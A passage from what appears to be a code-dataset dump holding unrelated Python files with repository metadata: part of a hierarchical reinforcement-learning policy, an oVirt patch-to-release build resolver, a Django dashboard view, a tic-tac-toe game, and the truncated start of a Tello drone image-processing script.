\"\"\"Perform a gradient update step.\n\n This is done both at every level of the hierarchy.\n\n The kwargs argument for this method contains two additional terms:\n\n * update_meta (bool): specifies whether to perform a gradient update\n step for the meta-policies\n * update_meta_actor (bool): similar to the `update_policy` term, but\n for the meta-policy. Note that, if `update_meta` is set to False,\n this term is void.\n\n **Note**; The target update soft updates for all policies occur at the\n same frequency as their respective actor update frequencies.\n\n Parameters\n ----------\n update_actor : bool\n specifies whether to update the actor policy. The critic policy is\n still updated if this value is set to False.\n \"\"\"\n # Not enough samples in the replay buffer.\n if not self.replay_buffer.can_sample():\n return\n\n # Specifies whether to remove additional data from the replay buffer\n # sampling procedure. Since only a subset of algorithms use additional\n # data, removing it can speedup the other algorithms.\n with_additional = self.off_policy_corrections\n\n # Specifies the levels to collect data from, corresponding to the\n # levels that will be trained. This also helps speedup the operation.\n collect_levels = [i for i in range(self.num_levels - 1) if\n kwargs[\"update_meta\"][i]] + [self.num_levels - 1]\n\n # Get a batch.\n obs0, obs1, act, rew, done, additional = self.replay_buffer.sample(\n with_additional, collect_levels)\n\n # Do not use done masks for lower-level policies with negative\n # intrinsic rewards (these the policies to terminate early).\n if self._negative_reward_fn():\n for i in range(self.num_levels - 1):\n done[i+1] = np.array([False] * len(done[i+1]))\n\n # Loop through all meta-policies.\n for i in range(self.num_levels - 1):\n if kwargs['update_meta'][i] and not self._pretrain_level(i):\n # Replace the goals with the most likely goals.\n if self.off_policy_corrections and i == 0: # FIXME\n meta_act = self._sample_best_meta_action(\n meta_obs0=obs0[i],\n meta_obs1=obs1[i],\n meta_action=act[i],\n worker_obses=additional[\"worker_obses\"],\n worker_actions=additional[\"worker_actions\"],\n k=8\n )\n act[i] = meta_act\n\n if self.cooperative_gradients:\n # Perform the cooperative gradients update procedure.\n self._cooperative_gradients_update(\n obs0=obs0,\n actions=act,\n rewards=rew,\n obs1=obs1,\n terminals1=done,\n level_num=i,\n update_actor=kwargs['update_meta_actor'],\n )\n else:\n # Perform the regular meta update procedure.\n self.policy[i].update_from_batch(\n obs0=obs0[i],\n actions=act[i],\n rewards=rew[i],\n obs1=obs1[i],\n terminals1=done[i],\n update_actor=kwargs['update_meta_actor'],\n )\n\n # Update the lowest level policy.\n self.policy[-1].update_from_batch(\n obs0=obs0[-1],\n actions=act[-1],\n rewards=rew[-1],\n obs1=obs1[-1],\n terminals1=done[-1],\n update_actor=update_actor,\n )\n\n def get_action(self, obs, context, apply_noise, random_actions, env_num=0):\n \"\"\"See parent class.\"\"\"\n # Increment the internal number of get_action calls.\n self._steps += 1\n\n # Loop through the policies in the hierarchy.\n for i in range(self.num_levels - 1):\n if self._update_meta(i, env_num):\n if self._pretrain_level(i):\n # Sample goals randomly when performing pre-training.\n self.meta_action[env_num][i] = np.array([\n self.policy[i].ac_space.sample()])\n else:\n context_i = context if i == 0 \\\n else self.meta_action[env_num][i - 1]\n\n # Update the meta action based on the output from the\n # policy if the time period requires is.\n self.meta_action[env_num][i] = self.policy[i].get_action(\n obs, context_i, apply_noise, random_actions)\n else:\n # Update the meta-action in accordance with a fixed transition\n # function.\n self.meta_action[env_num][i] = self.goal_transition_fn(\n obs0=np.array(\n [self._observations[env_num][-1][self.goal_indices]]),\n goal=self.meta_action[env_num][i],\n obs1=obs[:, self.goal_indices]\n )\n\n # Return the action to be performed within the environment (i.e. the\n # action by the lowest level policy).\n action = self.policy[-1].get_action(\n obs=obs,\n context=self.meta_action[env_num][-1],\n apply_noise=apply_noise,\n random_actions=random_actions and self.pretrain_path is None)\n\n return action\n\n def store_transition(self, obs0, context0, action, reward, obs1, context1,\n done, is_final_step, env_num=0, evaluate=False):\n \"\"\"See parent class.\"\"\"\n # the time since the most recent sample began collecting step samples\n t_start = len(self._observations[env_num])\n\n # Flatten the observations.\n obs0 = obs0.flatten()\n obs1 = obs1.flatten()\n\n for i in range(1, self.num_levels):\n # Actions and intrinsic rewards for the high-level policies are\n # only updated when the action is recomputed by the graph.\n if self._update_meta(self.num_levels - i, env_num):\n self._rewards[env_num][-i].append(0)\n self._actions[env_num][-i-1].append(\n self.meta_action[env_num][-i].flatten())\n\n # Compute the intrinsic rewards and append them to the list of\n # rewards.\n self._rewards[env_num][-i][-1] += \\\n self.intrinsic_reward_scale[-i] * \\\n self.intrinsic_reward_fn(\n states=obs0,\n goals=self.meta_action[env_num][-i].flatten(),\n next_states=obs1\n )\n\n # The highest level policy receives the sum of environmental rewards.\n self._rewards[env_num][0][0] += reward\n\n # The lowest level policy's actions are received from the algorithm.\n self._actions[env_num][-1].append(action)\n\n # Add the environmental observations and contextual terms to their\n # respective lists.\n self._observations[env_num].append(obs0)\n if t_start == 0:\n self._contexts[env_num].append(context0)\n\n # Modify the done mask in accordance with the TD3 algorithm. Done masks\n # that correspond to the final step are set to False.\n self._dones[env_num].append(done and not is_final_step)\n\n # Add a sample to the replay buffer.\n if self._update_meta(0, env_num) or done:\n # Add the last observation and context.\n self._observations[env_num].append(obs1)\n self._contexts[env_num].append(context1)\n\n # Compute the current state goals to add to the final observation.\n for i in range(self.num_levels - 1):\n self._actions[env_num][i].append(self.goal_transition_fn(\n obs0=obs0[self.goal_indices],\n goal=self.meta_action[env_num][i],\n obs1=obs1[self.goal_indices]\n ).flatten())\n\n # Avoid storing samples when performing evaluations.\n if not evaluate:\n if not self.hindsight \\\n or random.random() < self.subgoal_testing_rate:\n # Store a sample in the replay buffer.\n self.replay_buffer.add(\n obs_t=self._observations[env_num],\n context_t=self._contexts[env_num],\n action_t=self._actions[env_num],\n reward_t=self._rewards[env_num],\n done_t=self._dones[env_num],\n )\n\n if self.hindsight:\n # Some temporary attributes.\n worker_obses = [\n self._get_obs(self._observations[env_num][i],\n self._actions[env_num][0][i], 0)\n for i in range(len(self._observations[env_num]))]\n intrinsic_rewards = self._rewards[env_num][-1]\n\n # Implement hindsight action and goal transitions.\n goal, rewards = self._hindsight_actions_goals(\n initial_observations=worker_obses,\n initial_rewards=intrinsic_rewards\n )\n new_actions = deepcopy(self._actions[env_num])\n new_actions[0] = goal\n new_rewards = deepcopy(self._rewards[env_num])\n new_rewards[-1] = rewards\n\n # Store the hindsight sample in the replay buffer.\n self.replay_buffer.add(\n obs_t=self._observations[env_num],\n context_t=self._contexts[env_num],\n action_t=new_actions,\n reward_t=new_rewards,\n done_t=self._dones[env_num],\n )\n\n # Clear the memory that has been stored in the replay buffer.\n self.clear_memory(env_num)\n\n def _update_meta(self, level, env_num):\n \"\"\"Determine whether a meta-policy should update its action.\n\n This is done by checking the length of the observation lists that are\n passed to the replay buffer, which are cleared whenever the highest\n level meta-period has been met or the environment has been reset.\n\n If the meta period is defined as a list, the period of level i (indexed\n from highest to lowest) is equal to the multiple of the elements in the\n list after index i.\n\n Parameters\n ----------\n level : int\n the level of the policy\n env_num : int\n the environment number. Used to handle situations when multiple\n parallel environments are being used.\n\n Returns\n -------\n bool\n True if the action should be updated by the meta-policy at the\n given level\n \"\"\"\n # In the case of passing the lowest level policy, return True (always\n # perform an action).\n if level == self.num_levels - 1:\n return True\n\n # the time since the most recent sample began collecting step samples\n t_start = len(self._observations[env_num])\n\n # meta-action period of the given level\n if isinstance(self.meta_period, int):\n level_period = self.meta_period ** (self.num_levels - level - 1)\n else:\n level_period = reduce((lambda x, y: x*y), self.meta_period[level:])\n\n return t_start % level_period == 0\n\n def clear_memory(self, env_num):\n \"\"\"Clear internal memory that is used by the replay buffer.\"\"\"\n self._actions[env_num] = [[] for _ in range(self.num_levels)]\n self._rewards[env_num] = \\\n [[0]] + [[] for _ in range(self.num_levels - 1)]\n self._observations[env_num] = []\n self._contexts[env_num] = []\n self._dones[env_num] = []\n\n def get_td_map(self):\n \"\"\"See parent class.\"\"\"\n # Not enough samples in the replay buffer.\n if not self.replay_buffer.can_sample():\n return {}\n\n # Get a batch.\n obs0, obs1, act, rew, done, _ = self.replay_buffer.sample(False)\n\n td_map = {}\n for i in range(self.num_levels):\n td_map.update(self.policy[i].get_td_map_from_batch(\n obs0=obs0[i],\n actions=act[i],\n rewards=rew[i],\n obs1=obs1[i],\n terminals1=done[i]\n ))\n\n return td_map\n\n def _negative_reward_fn(self):\n \"\"\"Return True if the intrinsic reward returns negative values.\n\n Intrinsic reward functions with negative rewards incentivize early\n terminations, which we attempt to mitigate in the training operation by\n preventing early terminations from return an expected return of 0.\n \"\"\"\n return \"exp\" not in self.intrinsic_reward_type \\\n and \"non\" not in self.intrinsic_reward_type\n\n def _pretrain_level(self, level):\n \"\"\"Check whether the current level should be training.\n\n When using `pretrain_worker` the lowest level policy is trained every\n step, and higher level policies are incrementally unfrozen for a\n fraction of the training steps. The highest level policy is not trained\n in this case, but the checkpoints can later be used to continue\n training the entire hierarchy.\n\n Parameters\n ----------\n level : int\n the level of the policy\n\n Returns\n -------\n bool\n True if the level should not be trained and should perform random\n actions, False otherwise\n \"\"\"\n # number of steps to perform pretraining for a given level, assuming\n # pretrain_worker is set to True.\n pretrain_steps = self.total_steps * \\\n (self.num_levels - level - 1) / (self.num_levels - 1)\n\n if level == 0:\n # bug fix for the final step\n return self.pretrain_worker\n else:\n return self.pretrain_worker and (self._steps < pretrain_steps)\n\n # ======================================================================= #\n # Auxiliary methods for HIRO #\n # ======================================================================= #\n\n def _sample_best_meta_action(self,\n meta_obs0,\n meta_obs1,\n meta_action,\n worker_obses,\n worker_actions,\n k=10):\n \"\"\"Return meta-actions that approximately maximize low-level log-probs.\n\n Parameters\n ----------\n meta_obs0 : array_like\n (batch_size, m_obs_dim) matrix of meta observations\n meta_obs1 : array_like\n (batch_size, m_obs_dim) matrix of next time step meta observations\n meta_action : array_like\n (batch_size, m_ac_dim) matrix of meta actions\n worker_obses : array_like\n (batch_size, w_obs_dim, meta_period+1) matrix of current Worker\n state observations\n worker_actions : array_like\n (batch_size, w_ac_dim, meta_period) matrix of current Worker\n environmental actions\n k : int, optional\n number of goals returned, excluding the initial goal and the mean\n value\n\n Returns\n -------\n array_like\n (batch_size, m_ac_dim) matrix of most likely meta actions\n \"\"\"\n batch_size, goal_dim = meta_action.shape\n\n # Collect several samples of potentially optimal goals.\n sampled_actions = self._sample(meta_obs0, meta_obs1, meta_action, k)\n assert sampled_actions.shape == (batch_size, goal_dim, k)\n\n # Compute the fitness of each candidate goal. The fitness is the sum of\n # the log-probabilities of each action for the given goal.\n fitness = self._log_probs(\n sampled_actions, worker_obses, worker_actions)\n assert fitness.shape == (batch_size, k)\n\n # For each sample, choose the meta action that maximizes the fitness.\n indx = np.argmax(fitness, 1)\n best_goals = np.asarray(\n [sampled_actions[i, :, indx[i]] for i in range(batch_size)])\n\n return best_goals\n\n def _sample(self, meta_obs0, meta_obs1, meta_action, num_samples, sc=0.5):\n \"\"\"Sample different goals.\n\n The goals are sampled as follows:\n\n * The first num_samples-2 goals are acquired from a random Gaussian\n distribution centered at s_{t+c} - s_t.\n * The second to last goal is s_{t+c} - s_t.\n * The last goal is the originally sampled goal g_t.\n\n Parameters\n ----------\n meta_obs0 : array_like\n (batch_size, m_obs_dim) matrix of meta observations\n meta_obs1 : array_like\n (batch_size, m_obs_dim) matrix of next time step meta observations\n meta_action : array_like\n (batch_size, m_ac_dim) matrix of meta actions\n num_samples : int\n number of samples\n sc : float\n scaling factor for the normal distribution.\n\n Returns\n -------\n array_like\n (batch_size, goal_dim, num_samples) matrix of sampled goals\n\n Helps\n -----\n * _sample_best_meta_action(self)\n \"\"\"\n batch_size, goal_dim = meta_action.shape\n goal_space = self.policy[0].ac_space\n spec_range = goal_space.high - goal_space.low\n random_samples = num_samples - 2\n\n # Compute the mean and std for the Gaussian distribution to sample\n # from, and well as the maxima and minima.\n loc = meta_obs1[:, self.goal_indices] - meta_obs0[:, self.goal_indices]\n scale = [sc * spec_range / 2]\n minimum, maximum = [goal_space.low], [goal_space.high]\n\n new_loc = np.zeros((batch_size, goal_dim, random_samples))\n new_scale = np.zeros((batch_size, goal_dim, random_samples))\n for i in range(random_samples):\n new_loc[:, :, i] = loc\n new_scale[:, :, i] = scale\n\n new_minimum = np.zeros((batch_size, goal_dim, num_samples))\n new_maximum = np.zeros((batch_size, goal_dim, num_samples))\n for i in range(num_samples):\n new_minimum[:, :, i] = minimum\n new_maximum[:, :, i] = maximum\n\n # Generate random samples for the above distribution.\n normal_samples = np.random.normal(\n size=(random_samples * batch_size * goal_dim))\n normal_samples = normal_samples.reshape(\n (batch_size, goal_dim, random_samples))\n\n samples = np.zeros((batch_size, goal_dim, num_samples))\n samples[:, :, :-2] = new_loc + normal_samples * new_scale\n samples[:, :, -2] = loc\n samples[:, :, -1] = meta_action\n\n # Clip the values based on the meta action space range.\n samples = np.minimum(np.maximum(samples, new_minimum), new_maximum)\n\n return samples\n\n def _log_probs(self, meta_actions, worker_obses, worker_actions):\n \"\"\"Calculate the log probability of the next goal by the meta-policies.\n\n Parameters\n ----------\n meta_actions : array_like\n (batch_size, m_ac_dim, num_samples) matrix of candidate higher-\n level policy actions\n worker_obses : array_like\n (batch_size, w_obs_dim, meta_period + 1) matrix of lower-level\n policy observations\n worker_actions : array_like\n (batch_size, w_ac_dim, meta_period) list of lower-level policy\n actions\n\n Returns\n -------\n array_like\n (batch_size, num_samples) fitness associated with every state /\n action / goal pair\n\n Helps\n -----\n * _sample_best_meta_action(self):\n \"\"\"\n raise NotImplementedError\n\n # ======================================================================= #\n # Auxiliary methods for HAC #\n # ======================================================================= #\n\n def _hindsight_actions_goals(self, initial_observations, initial_rewards):\n \"\"\"Calculate hindsight goal and action transitions.\n\n These are then stored in the replay buffer along with the original\n (non-hindsight) sample.\n\n See the README at the front page of this repository for an in-depth\n description of this procedure.\n\n Parameters\n ----------\n initial_observations : array_like\n the original worker observations with the non-hindsight goals\n appended to them\n initial_rewards : array_like\n the original intrinsic rewards\n\n Returns\n -------\n array_like\n the goal at every step in hindsight\n array_like\n the modified intrinsic rewards taking into account the hindsight\n goals\n\n Helps\n -----\n * store_transition(self):\n \"\"\"\n new_goals = []\n observations = deepcopy(initial_observations)\n rewards = deepcopy(initial_rewards)\n hindsight_goal = 0 if self.relative_goals \\\n else observations[-1][self.goal_indices]\n obs_tp1 = observations[-1]\n\n for i in range(1, len(observations) + 1):\n obs_t = observations[-i]\n\n # Calculate the hindsight goal in using relative goals. If not, the\n # hindsight goal is simply a subset of the final state observation.\n if self.relative_goals:\n hindsight_goal += \\\n obs_tp1[self.goal_indices] - obs_t[self.goal_indices]\n\n # Modify the Worker intrinsic rewards based on the new hindsight\n # goal.\n if i > 1:\n # FIXME: intrinsic_reward_scale\n rewards[-(i - 1)] = self.intrinsic_reward_scale[0] \\\n * self.intrinsic_reward_fn(obs_t, hindsight_goal, obs_tp1)\n\n obs_tp1 = deepcopy(obs_t)\n new_goals = [deepcopy(hindsight_goal)] + new_goals\n\n return new_goals, rewards\n\n # ======================================================================= #\n # Auxiliary methods for CHER #\n # ======================================================================= #\n\n def _setup_cooperative_gradients(self):\n \"\"\"Create the cooperative gradients meta-policy optimizer.\"\"\"\n raise NotImplementedError\n\n def _cooperative_gradients_update(self,\n obs0,\n actions,\n rewards,\n obs1,\n terminals1,\n level_num,\n update_actor=True):\n \"\"\"Perform the gradient update procedure for the CHER algorithm.\n\n This procedure is similar to update_from_batch, expect it runs the\n self.cg_optimizer operation instead of the policy object's optimizer,\n and utilizes some information from the worker samples as well.\n\n Parameters\n ----------\n obs0 : list of array_like\n (batch_size, obs_dim) matrix of observations for every level in the\n hierarchy\n actions : list of array_like\n (batch_size, ac_dim) matrix of actions for every level in the\n hierarchy\n obs1 : list of array_like\n (batch_size, obs_dim) matrix of next step observations for every\n level in the hierarchy\n rewards : list of array_like\n (batch_size,) vector of rewards for every level in the hierarchy\n terminals1 : list of numpy bool\n (batch_size,) vector of done masks for every level in the hierarchy\n level_num : int\n the hierarchy level number of the policy to optimize\n update_actor : bool\n specifies whether to update the actor policy of the meta policy.\n The critic policy is still updated if this value is set to False.\n\n Returns\n -------\n [float, float]\n meta-policy critic loss\n float\n meta-policy actor loss\n \"\"\"\n raise NotImplementedError\n","repo_name":"AboudyKreidieh/h-baselines","sub_path":"hbaselines/goal_conditioned/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":49008,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"53"} +{"seq_id":"34903604113","text":"#!/usr/bin/env python\n\"\"\"ovirt_build_resolver.py - Map between oVirt patches\nand their candidate release branches.\n\"\"\"\nfrom __future__ import absolute_import, print_function\nfrom collections import namedtuple\nimport os\nimport logging\nfrom xdg.BaseDirectory import xdg_cache_home\nfrom stdci_libs.git_utils import git\nfrom stdci_libs.stdci_dsl.api import get_threads_with_globals\nfrom stdci_libs.jenkins_objects import JobRunSpec\nfrom hashlib import sha1\nfrom six import itervalues, iteritems, string_types\nfrom functools import partial\n\nCACHE_NAME = 'gate_cache'\nlogger = logging.getLogger(__name__)\npatch_object = namedtuple(\n 'patch_object', ['name', 'refspec', 'branch', 'url', 'sha']\n)\n\n\ndef create_gate_info(sources_table, queue_prefix, st_project):\n \"\"\"Given a sources table, generate data we need to run gate tests\n\n :param str sources_table: A newline-and-space-seperated table of patches\n to be parsed by `parse_sources_table`.\n :param str queue_prefix: The prefix for change queue names that we support\n projects sending into. If given, only release\n queues that begin with the given prefix will be\n returned, and the prefix will be stripped from\n their names.\n :param str st_project: The name of the project that contains the test\n suits that will be run by the gating logic.\n\n :rtype: dict\n :returns: A dict with a 'builds' key that includes required build\n information as generaed by `create_build_jobs` and an Optional\n `st_project_refspec` key that contains the the last refspec of\n the st_project that is found in the `sources_table` if its there.\n \"\"\"\n sources_list = parse_sources_table(sources_table, queue_prefix)\n sources_list = list(sources_list)\n gate_info = {'builds': list(create_build_jobs(sources_list))}\n st_project_patch = find_last_patch(sources_list, st_project)\n if st_project_patch is not None:\n gate_info['st_project'] = {\n k: getattr(st_project_patch, k)\n for k in ('url', 'refspec', 'branch')\n }\n return gate_info\n\n\ndef create_build_jobs(sources_list):\n \"\"\"Get sources_table info from given str and build jobs threads from it.\n\n :param str sources_list: List of source object and releases as generated\n by `parse_sources_table'.\n\n :rtype: iterator\n :returns: iterator containing tuples where each contains a triplet of a\n build job triggering specification, a list of releases or release\n queues the build should be sent into and a representative name to\n describe the build as it is running.\n \"\"\"\n patch_to_release = unique_patches_per_release(sources_list)\n jrs_list = (\n (\n create_job_spec(patch_object),\n release,\n create_pipeline_thread_name(patch_object)\n )\n for patch_object, release in patch_to_release\n )\n return jrs_list\n\n\ndef parse_sources_table(sources_table, queue_prefix=None):\n \"\"\"Parse each patch and yield it's data\n\n :param str sources_table: A newline-and-space-seperated table of patches\n where each row includes a url, a branch and\n a refspec.\n :param str queue_prefix: (Optional) The prefix for change queue names\n that we support projects sending into. If given,\n only release queues that begin with the given\n prefix will be returned, and the prefix will be\n stripped from their names.\n\n :rtype: iterator of tuples\n :returns: returns for each patch in the sources_table a tuples of\n patch_object and a list of release queues this patch targets.\n \"\"\"\n for patch in sources_table.splitlines():\n patch_data = create_patch_object(patch)\n releases = get_release_queues(patch_data, queue_prefix)\n yield (patch_data, releases)\n\n\ndef find_last_patch(sources_list, project):\n \"\"\"Find the last patch object for a given project\n\n :param iterable sources_list: List of source object and releases associated\n generated by `parse_sources_table'.\n :param str project: A name of a project to find a patch for\n\n :rtype: str\n :returns: The patch object for the last patch for the project specified in\n `project` that is found in `sources_list`, or None is not found\n \"\"\"\n proj_refs = [po for po, _ in sources_list if po.name == project]\n if proj_refs:\n return proj_refs[-1]\n else:\n return None\n\n\ndef create_patch_object(patch):\n \"\"\"per single patch, create it's data.\n :params str: patch.\n :rtype: patch_object.\n :returns: instance of patch object.\n \"\"\"\n url, branch, refspec = patch.split()\n name = get_project_name(url)\n sha = get_patch_sha(url, refspec)\n return patch_object(name, refspec, branch, url, sha)\n\n\ndef get_project_name(project_url):\n \"\"\"Retrives project name from a given URL.\n :params str: project_url\n :rtype : str\n :returns : project's name\n \"\"\"\n project_name = project_url.split('/')[-1]\n if '.git' in project_name:\n project_name = project_name.split('.git')[0]\n return project_name\n\n\ndef clone_project(url, refspec):\n \"\"\"Clone project, fetch, and checkout the refspec in order to read later\n the stdci.yaml configuration.\n :params str url: url of the remote git repo.\n :params str refspec: the commit to check with.\n :params str branch: the branch associated with the commit to get the\n releases from.\n :rtype: str/list\n :returns: returns a string for a single ovirt release, or a list for\n multiple releases.\n \"\"\"\n cache_dir_name = sha1(url.encode('utf-8')).hexdigest()\n cache_dir_path = os.path.join(xdg_cache_home, CACHE_NAME, cache_dir_name)\n cache_git_dir = os.path.join(cache_dir_path, '.git')\n logger.debug(\"Cache git dir is: {0}\".format(cache_git_dir))\n git('init', cache_dir_path)\n rgit = partial(\n git, '--git-dir=' + cache_git_dir,\n '--work-tree=' + cache_dir_path\n )\n rgit('fetch', '-u', url, '+{0}:myhead'.format(refspec))\n rgit('checkout', 'myhead')\n rgit('reset', '--hard', 'HEAD')\n rgit('clean', '-fdx')\n return cache_dir_path\n\n\ndef get_patch_sha(url, refspec):\n project_dir = clone_project(url, refspec)\n project_git_dir = os.path.join(project_dir, '.git')\n sha = git('--git-dir={0}'.format(project_git_dir), 'rev-parse', 'HEAD')\n return sha\n\n\ndef get_release_queues(patch_object, queue_prefix=None):\n \"\"\"Returns release branches per project's branch.\n\n :param patch_object patch_object: object containing patch data.\n :param str queue_prefix: (Optional) The prefix for change queue\n names that we support projects sending\n into. If given, only release queues that\n begin with the given prefix will be\n returned, and the prefix will be\n stripped.\n\n :rtype: list\n :returns: returns a list of releases, None if there is no release.\n \"\"\"\n project_dir = clone_project(patch_object.url, patch_object.refspec)\n _, gopts = get_threads_with_globals(project_dir, 'build-artifacts')\n rb = gopts.get('releasebranches', {})\n releases = rb.get(patch_object.branch, [])\n if isinstance(releases, string_types):\n releases = [releases]\n if queue_prefix is not None:\n releases = [\n release[len(queue_prefix)+1:]\n for release in releases\n if release.startswith(queue_prefix + '-')\n ]\n return releases\n\n\ndef create_job_spec(project):\n \"\"\"create a job for specific project\n :params project: project specification.\n :rtype: JobRunSpec\n :returns: JobRunSpec instance for a given project.\n \"\"\"\n return JobRunSpec(\n job_name=project.name + \"_standard-builder\",\n params=dict(\n STD_CI_REFSPEC=project.refspec,\n STD_CI_CLONE_URL=project.url\n )\n ).as_pipeline_build_step()\n\n\ndef create_pipeline_thread_name(patch):\n \"\"\"Generating parallel thread name for the patch.\n :params: patch object\n :rtype: str\n :returns: thread name for the parallel build\n \"\"\"\n job_name = \"-\".join([patch.name, patch.sha[0:7]])\n return job_name\n\n\ndef unique_patches_per_release(patches):\n \"\"\"\n :params: list of patches\n :rtype: dict\n :returns: dict of mapping between patches to releases.\n \"\"\"\n release_to_patches = dict()\n for patch_object, releases in patches:\n for release in releases:\n release_to_patches.setdefault(\n release, {})[patch_object.name] = patch_object\n patches_to_releases = dict()\n for release, patch_dict in iteritems(release_to_patches):\n for patch_obj in itervalues(patch_dict):\n patches_to_releases.setdefault(patch_obj, []).append(release)\n\n return iteritems(patches_to_releases)\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/ost_build_resolver.py","file_name":"ost_build_resolver.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"23096346703","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom dashboard.mixins import PageTitleMixin\nfrom django.views import generic\n\nfrom measurement.models import Metric, Flag, Probe\nfrom event.models import Event\nfrom Case.models import Case\n\nclass HomeView(LoginRequiredMixin, PageTitleMixin, generic.TemplateView):\n \"\"\"HomeView: TemplateView than\n display the home page\"\"\"\n template_name = \"dashboard/home.html\"\n page_header = \"VSF\"\n page_header_description = \"Home Page\"\n breadcrumb = [\"\"]\n\n def get_context_data(self, **kwargs):\n \"\"\" Insert in context all numbers and the last 10 rows of Cases,\n Events, Flags and Measurements\"\"\"\n context = super(HomeView, self).get_context_data(**kwargs)\n\n \"\"\" Events variables to insert in context\"\"\"\n events_num = Event.objects.count()\n events_sketch_num = Event.objects.filter(draft=True).count()\n events_publish_num = events_num - events_sketch_num\n events = Event.objects.all().order_by('-id')[:10]\n\n \"\"\" Cases variables to insert in context\"\"\"\n cases_num = Case.objects.count()\n cases_sketch_num = Case.objects.filter(draft=True).count()\n cases_publish_num = cases_num - cases_sketch_num\n cases = Case.objects.all().order_by('-id')[:10]\n\n \"\"\" Flags variables to insert in context\"\"\"\n flags = Flag.objects.all().order_by('-id')[:10]\n flags_num = Flag.objects.count()\n flags_hard_num = Flag.objects.filter(flag=True).count()\n flags_muted_num = Flag.objects.filter(flag=None).count()\n flags_soft_num = flags_num - flags_muted_num - flags_hard_num\n\n \"\"\" Measurements variables to insert in context,\n including number of probes ans reports\"\"\"\n metrics_num = Metric.objects.count()\n metrics = Metric.objects.all().order_by('-id')[:10]\n context['probes_num'] = Probe.objects.count()\n context['reports_num'] = Metric.objects.values(\n \t'report_id').distinct().count()\n\n context['metrics_num'] = metrics_num\n context['metrics'] = metrics\n context['flags'] = flags\n context['flags_num'] = flags_num\n context['flags_hard_num'] = flags_hard_num\n context['flags_soft_num'] = flags_soft_num\n context['flags_muted_num'] = flags_muted_num\n context['events_num'] = events_num\n context['events_sketch_num'] = events_sketch_num\n context['events_publish_num'] = events_publish_num\n context['events'] = events\n context['cases_num'] = cases_num\n context['cases_sketch_num'] = cases_sketch_num\n context['cases_publish_num'] = cases_publish_num\n context['cases'] = cases\n return context\n","repo_name":"VEinteligente/vsf-incidents-server","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13712018143","text":"#!/usr/bin/env python3\nimport random\n\nclass TTTBoard():\n def __init__(self):\n self.queued_player = 'X'\n self.init_board()\n self.plays = 0\n\n def init_board(self):\n self.board = []\n count = 1\n for _ in range(3):\n row = []\n for __ in range(3):\n row.append(count)\n count += 1\n self.board.append(row)\n\n def display_board(self):\n b = self.board\n game_display = \"\"\"\n {} | {} | {}\n ----------\n {} | {} | {}\n ----------\n {} | {} | {}\n\"\"\".format(b[0][0], b[0][1], b[0][2], b[1][0], b[1][1], b[1][2], b[2][0], b[2][1], b[2][2])\n print(game_display)\n\n def switch_queued_player(self):\n if self.queued_player == 'X':\n self.queued_player = 'O'\n else:\n self.queued_player = 'X'\n\n def play_position(self, position):\n if not position.isdigit():\n return False\n position = int(position)\n if not 1 <= position <= 9:\n return False\n index = 1\n for row in range(3):\n for col in range(3):\n if index == position:\n if type(self.board[row][col]) != int:\n return False\n self.board[row][col] = self.queued_player\n self.plays += 1\n return True\n index += 1\n return False\n\n def check_winner(self):\n b = self.board\n for i in range(3):\n if len(set(b[i])) == 1 and type(b[i][0]) != int:\n return b[i][0]\n if (len(set([b[0][i], b[1][i], b[2][i]])) == 1\n and type(b[0][i]) != int):\n return b[0][i]\n if len(set([b[0][0], b[1][1], b[2][2]])) == 1 and type(b[1][1]) != int:\n return b[1][1]\n if len(set([b[0][2], b[1][1], b[2][0]])) == 1 and type(b[1][1]) != int:\n return b[1][1]\n return None\n\n def computer_play(self):\n count = sum([1 if type(c) == int else 0 for r in self.board for c in r])\n move = random.randint(1, count)\n for row in range(3):\n for col in range(3):\n if type(self.board[row][col]) == int:\n move -= 1\n if move == 0:\n self.board[row][col] = self.queued_player\n self.plays += 1\n return True\n return False\n\n def game_loop(self):\n while True:\n self.display_board()\n print('pick the number of the position you would like to play')\n position = None\n while position is None:\n position = input('an integer 1 - 9 only ')\n if self.play_position(position) is False:\n position = None\n print('invalid game choice, please play again')\n if self.check_winner() is not None: break\n if self.plays == 9: break\n self.switch_queued_player()\n while self.computer_play() is False: pass\n if self.check_winner() is not None: break\n self.switch_queued_player()\n print('and the winner is...')\n print(self.check_winner())\n\ndef main_app():\n game = TTTBoard()\n game.game_loop()\n\n\nif __name__ == \"__main__\":\n main_app()\n","repo_name":"johncoleman83/codewars","sub_path":"tic_tac_toe/one_player.py","file_name":"one_player.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25311120544","text":"import sys # kikai honyaku \nimport traceback\nimport tellopy\nimport av\nimport cv2.cv2 as cv2\nimport numpy as np\nimport time\nimport glob\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib.patches import Polygon\nimport datetime\nimport math\nfrom parse import parse\nimport threading \nimport socket\n\ndef main():\n drone = tellopy.Tello() #tello controller\n\n try:\n drone.connect() #tello connection\n drone.wait_for_connection(60.0)\n \n retry = 3\n container = None\n while container is None and 0 < retry:\n retry -= 1\n try:\n # 動画の受信開始を処理\n container = av.open(drone.get_video_stream()) # container = tello video eizou no assyuku de-ta wo tenkai\n except av.AVError as ave:\n print(ave)\n print('retry...')\n \n frame_skip = 300 #douga setuzokumaeno \n while True:\n for frame in container.decode(video=0): # .decode byte(eizou no nakami) -> moziretu\n if 0 < frame_skip: #フレームスキップ処理\n frame_skip = frame_skip - 1\n continue\n \n start_time = time.time() # time.time UNIX time(0:0:0) karano keika zikan\n \n image_origin = cv2.cvtColor(np.array(frame.to_image()), cv2.COLOR_RGB2BGR) #RGB convert\n gray = cv2.cvtColor(np.array(frame.to_image()), cv2.COLOR_BGR2GRAY)\n\n imagesplit1 = cv2.split(image_origin)\n\n #Gg = imagesplit1[1] / gray\n Gg = image_origin[:,:,1] / gray\n\n shape = image_origin.shape\n for x in range(0, shape[0]):\n for y in range(0, shape[1]):\n if Gg[x,y] < 0.89: \n Gg[x,y] = 1\n else:\n Gg[x,y] = 0\n \n G1 